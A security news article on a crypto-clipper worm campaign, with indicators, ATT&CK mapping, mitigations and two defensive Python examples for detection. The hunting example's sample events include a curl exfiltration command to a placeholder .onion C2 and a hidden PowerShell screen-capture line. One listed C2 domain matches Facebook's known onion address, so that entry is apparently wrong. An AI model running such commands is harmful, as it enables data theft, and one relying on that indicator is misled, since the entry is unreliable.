Microsoft Threat Intelligence has uncovered a sophisticated cryptocurrency clipper campaign dubbed CryptoBandits, active since February 2026, that combines clipboard hijacking, USB-based worm propagation, Tor-anonymized command-and-control (C2) communications, and remote code execution to silently drain victims’ crypto wallets.
Unlike conventional clipboard stealers, this malware operates as a dual-purpose tool: a financially motivated stealer and a lightweight backdoor that can receive runtime instructions from a hidden .onion server while monitoring victims’ clipboards every 500 milliseconds.
Microsoft Defender Antivirus detects this threat under the signature Trojan:Win32/CryptoBandits.A and Trojan:JS/CryptoBandits.A, with multiple variants confirmed in the wild.
The campaign is categorized as a clipper malware attack, a class of malicious software that silently intercepts clipboard data and replaces cryptocurrency wallet addresses before a user pastes them into a transaction, rerouting funds to attacker-controlled wallets.
What makes CryptoBandits exceptionally dangerous is its architectural sophistication. It does not rely on a traditional installer or static IP-based C2 infrastructure.
Instead, it bundles its own portable Tor client (ugate.exe), routes all traffic through a local SOCKS5 proxy on localhost:9050, and blends data theft with remote code execution, giving operators both immediate financial returns and persistent backdoor access.
The attack begins when a victim plugs in or receives an infected USB storage device containing a malicious Windows Shortcut (.LNK) file.
Clicking the shortcut triggers a worm component that first checks if the device is already compromised; if not, it silently fetches the payload from a .onion C2 address via Tor.
Stage 1 — USB Worm Propagation:
The LNK payload scans the USB drive for common document types (.doc, .xlsx, .pdf), hides the original files, and replaces them with identically named malicious shortcuts that link to the worm.
When the next user opens what appears to be a harmless Word or PDF document, they unknowingly execute the malware. The worm also deploys two scheduled tasks for persistence: one to spread to newly inserted USB drives and another to maintain the stealer component.
Stage 2 — Defense Evasion:
All components are encrypted and decrypted only at runtime, with the installer obfuscated using PyArmor and packaged via PyInstaller.
The malware queries the Win32_Process WMI class and immediately terminates if Task Manager is detected among running processes, hindering manual triage.
Stage 3 — Clipper and Stealer Activation:
The clipper component, built on Windows Script Host (WSH) and ActiveXObject, launches the renamed Tor binary in a hidden window, waits ~60 seconds for Tor to bootstrap, generates a unique victim GUID, and registers the infected host with its hidden C2. From this point, the malware enters an infinite loop.
The malware polls the clipboard every 500 milliseconds, targeting a wide range of high-value cryptographic assets:
- 12-word and 24-word BIP39 seed phrases
- Ethereum private keys and Bitcoin WIF keys
- Bitcoin Legacy, P2SH, Bech32, and Taproot wallet addresses
- Tron and Monero wallet addresses
Address replacement is designed to reduce suspicion: the attacker’s substituted wallet address partially matches the first or last characters of the legitimate one.
For example, a Bitcoin Bech32 address starting with “bc1q” is replaced with one that matches only the last character, making a quick visual check of the address ends nearly useless.
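The two detection ideas above, classifying clipboard contents by asset class and measuring how little of a substituted address still matches the original, as an added example (not code from the report or the malware). The format patterns and the seed-phrase check are constructed approximations that check structure only, not checksums or the BIP39 wordlist.

```python
import os
import re
from typing import Dict, Optional

# Structural patterns for the asset classes the clipper targets (constructed
# for this example; format checks only, no checksum validation).
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"^1[a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc_p2sh": re.compile(r"^3[a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1q[ac-hj-np-z02-9]{38,58}$"),
    "btc_taproot": re.compile(r"^bc1p[ac-hj-np-z02-9]{58}$"),
    "btc_wif": re.compile(r"^[5KL][1-9A-HJ-NP-Za-km-z]{50,51}$"),
    "eth_private_key": re.compile(r"^(0x)?[0-9a-fA-F]{64}$"),
    "tron": re.compile(r"^T[1-9A-HJ-NP-Za-km-z]{33}$"),
    "monero": re.compile(r"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$"),
}


def classify(text: str) -> Optional[str]:
    """Return the asset class a clipboard value looks like, or None."""
    text = text.strip()
    words = text.split()
    # Seed phrases: 12 or 24 short lowercase words (wordlist membership not checked here).
    if len(words) in (12, 24) and all(re.fullmatch(r"[a-z]{3,8}", w) for w in words):
        return "bip39_seed"
    for name, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return name
    return None


def substitution_report(copied: str, pasted: str) -> Dict[str, object]:
    """Compare what the user copied with what the clipboard held at paste time.

    Flags a silent replacement when both values are the same asset class but
    differ, and reports how many leading and trailing characters still agree,
    which is all a glance at the start and end of an address ever verifies.
    Note the leading format prefix (e.g. 'bc1q') is shared by every address of
    that type, so a 4-character prefix match carries no assurance at all.
    """
    kind = classify(copied)
    if kind is None or copied == pasted or classify(pasted) != kind:
        return {"replaced": False, "kind": kind}
    prefix = len(os.path.commonprefix([copied, pasted]))
    suffix = len(os.path.commonprefix([copied[::-1], pasted[::-1]]))
    return {"replaced": True, "kind": kind,
            "matching_prefix": prefix, "matching_suffix": suffix}
```

A wallet workflow that compares the full copied value with the full pasted value, rather than eyeballing the ends, defeats the partial-match trick entirely.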
Beyond clipboard theft, the malware captures five screenshots every ten seconds and exfiltrates them to the C2 via curl routed through Tor. If the C2 server responds with an EVAL command, the malware executes arbitrary attacker-supplied JavaScript on the victim system, enabling full remote code execution.
The C2 infrastructure is built entirely on .onion domains, preventing conventional DNS-based blocking and IP reputation filtering. Communication uses HTTP over Tor via a SOCKS5 proxy, with curl POST requests carrying action tags such as SEED (exfiltrated seed phrase), PKEY (private key), REPL (wallet address replacement notification), and EVAL (remote code execution instruction).
Microsoft identified the following indicators, including the confirmed C2 .onion domains:
| Indicator | Type | Description |
|---|---|---|
| cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad.onion | Domain | C2 server |
| facebookwkhpilnemxj7asaniu7vnjjbiltxjqhye3mhbshg7kx5tfyd.onion | Domain | C2 server |
| ugate.exe | Filename | Portable Tor binary |
| 7630debd35cac6b7d58c4427695579b3e3a8b1cc462f523234cd6c698882a68c | SHA-256 | Crypto clipper worm |
MITRE ATT&CK Techniques
The campaign maps to several MITRE ATT&CK tactics:
- T1091 – Replication Through Removable Media (USB LNK delivery)
- T1059 – Command and Scripting Interpreter (WSH/EVAL-driven RCE)
- T1115 – Clipboard Data (seed phrase and wallet theft)
- T1090 – Proxy (Tor SOCKS5 routing)
- T1053.005 – Scheduled Task/Job (persistence)
- T1113 – Screen Capture (PowerShell screenshot exfiltration)
Mitigation
Microsoft recommends that defenders prioritize behavioral detection over static signatures, as the malware’s multilayer runtime obfuscation defeats most signature-based tools.
Immediate defensive actions include:
- Disable AutoRun/AutoPlay for all removable media
- Block .LNK file execution from USB drives via Group Policy Objects (GPOs)
- Restrict unnecessary use of wscript.exe and cscript.exe
- Hunt for localhost:9050 Tor proxy activity in network telemetry
- Monitor curl.exe usage with --socks5-hostname flags
- Alert on PowerShell-based screen capture and suspicious child processes spawned by script interpreters
- Review clipboard and screenshot behaviors on devices used for cryptocurrency transactions
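The hunting guidance above turned into a small rule set run over process-creation events, as an added example (not Microsoft's detection logic). The event records and command lines are constructed to resemble what Sysmon Event ID 1 or Defender DeviceProcessEvents expose; the .onion host is a placeholder, and the screen-capture heuristic (System.Drawing / CopyFromScreen) is an assumption about how a PowerShell screenshot typically looks, not a detail from the report.

```python
import re
from typing import Dict, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# curl pointed at the local Tor SOCKS5 proxy on port 9050.
TOR_SOCKS = re.compile(r"--socks5(?:-hostname)?\s+(?:127\.0\.0\.1|localhost):9050\b", re.I)
# Any .onion host appearing on a command line.
ONION_URL = re.compile(r"https?://[^\s/]+\.onion\b", re.I)
# Heuristic for PowerShell screen capture (assumption, see lead-in).
SCREENSHOT = re.compile(r"System\.Drawing|CopyFromScreen", re.I)

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": "explorer.exe", "image": "wscript.exe",
     "cmdline": r"wscript.exe //B C:\Users\Public\update.js"},
    {"parent": "wscript.exe", "image": "curl.exe",
     "cmdline": "curl.exe --socks5-hostname 127.0.0.1:9050 -X POST "
                "http://placeholder-c2.onion/gate -d action=REPL"},
    {"parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "Add-Type -AssemblyName System.Drawing; '
                '$g.CopyFromScreen(0,0,0,0,$b.Size)"'},
    {"parent": "cmd.exe", "image": "curl.exe",
     "cmdline": "curl.exe -s https://updates.example.com/manifest.json"},
]


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return the events that match at least one rule, with the reasons attached."""
    hits: List[Dict[str, object]] = []
    for ev in events:
        parent, image, cmd = ev["parent"].lower(), ev["image"].lower(), ev["cmdline"]
        reasons = []
        if image == "curl.exe" and TOR_SOCKS.search(cmd):
            reasons.append("curl routed through local Tor SOCKS5 proxy (port 9050)")
        if ONION_URL.search(cmd):
            reasons.append(".onion URL on the command line")
        if parent in SCRIPT_HOSTS and image in {"curl.exe", "powershell.exe", "cmd.exe"}:
            reasons.append(f"{parent} spawned {image}")
        if image == "powershell.exe" and SCREENSHOT.search(cmd):
            reasons.append("PowerShell screen-capture API usage")
        if reasons:
            hits.append({**ev, "reasons": reasons})
    return hits
```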
Microsoft Defender XDR can detect this campaign through alerts, including Suspicious JavaScript process, Possible data exfiltration using Curl, and Behavior:Win64/CurlOnion.STA.
Site: thecybrdef.com